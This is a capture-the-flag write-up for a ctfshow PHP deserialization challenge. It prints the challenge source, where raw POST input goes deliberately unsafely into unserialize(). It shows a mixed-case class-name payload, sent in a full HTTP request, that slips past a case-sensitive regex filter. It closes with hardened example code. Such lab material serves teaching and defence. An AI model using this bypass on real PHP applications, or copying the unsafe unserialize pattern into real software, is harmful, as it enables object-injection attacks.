Source code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}
For this challenge it is enough to get the input deserialized successfully once (after deserialization, __destruct() is called when the script ends, and that is where $flag is echoed).
The source filters the class name ctfshow, but the regex has no i flag, so the obvious guess is a case bypass.
Testing showed that PHP's deserialization is case-insensitive for key names, and for class names too.
So we build the POC like this:
<?php
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
}
$a = new ctfshow();
echo(serialize($a)); // O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
Change the case of ctfshow in the serialized string and send it with a POST request. Because the parameter is read through the php://input pseudo-protocol, no key name is needed; however, HackBar refuses to send a POST without a key name, so send a request with a key name from HackBar to Burp Suite and edit it there. Make sure the Content-Length is correct.
Request:
POST / HTTP/1.1
Host: 3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Origin: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show
Connection: close
Referer: http://3084db7a-3309-4420-b0ff-641fdc2292f7.challenge.ctf.show/
Cookie: _ga=GA1.2.217265325.1679571526
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
Note: do not urlencode the string, because php://input does not urldecode it.
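Looking at the same bug from the defender's side, the added example below (my own code, not the challenge author's) shows why the case-sensitive filter misses the mixed-case class name and how to close the hole: check the raw input case-insensitively before unserialize() and, more importantly, pass allowed_classes=false so that no real class, and therefore no __destruct(), is ever instantiated from user input. The class name and payloads are the ones from this write-up; the function names are mine.

```php
<?php
// Added example, not part of the challenge source.
// Shows the weak check beside a hardened replacement.

// The challenge's filter: case-sensitive, and it runs only AFTER
// unserialize() has already created the object (too late).
function naive_filter_blocks(string $cs): bool {
    return preg_match('/ctfshow/', $cs) === 1;
}

// Hardened handling of the same input.
function safe_unserialize(string $cs) {
    // 1. Inspect the raw string before any object exists. PHP resolves
    //    class names case-insensitively ("Ctfshow" is class ctfshow),
    //    so the check must be case-insensitive as well (/i flag).
    if (preg_match('/[OC]:\d+:"ctfshow"/i', $cs) === 1) {
        return null; // rejected, nothing was instantiated
    }
    // 2. Even for names we did not think of: allowed_classes=false turns
    //    every object into __PHP_Incomplete_Class, whose constructor,
    //    destructor and __toString never run user-defined code.
    return @unserialize($cs, ['allowed_classes' => false]);
}

// Payloads taken from the write-up above.
$lower = 'O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}';
$mixed = 'O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}';

// The naive filter only catches the lower-case spelling; the mixed-case
// payload passes straight through.
var_dump(naive_filter_blocks($lower));
var_dump(naive_filter_blocks($mixed));

// The hardened path rejects both spellings before instantiation.
var_dump(safe_unserialize($lower));
var_dump(safe_unserialize($mixed));

// A class name the filter never heard of still cannot reach a destructor:
// the result is an incomplete-class placeholder, not a live object.
$obj = safe_unserialize('O:5:"Other":0:{}');
var_dump($obj instanceof __PHP_Incomplete_Class);
```

In real code the safest fix is to not unserialize() attacker-controlled input at all (use JSON or a strict whitelist of allowed_classes); the regex here only documents the specific mistake in the challenge.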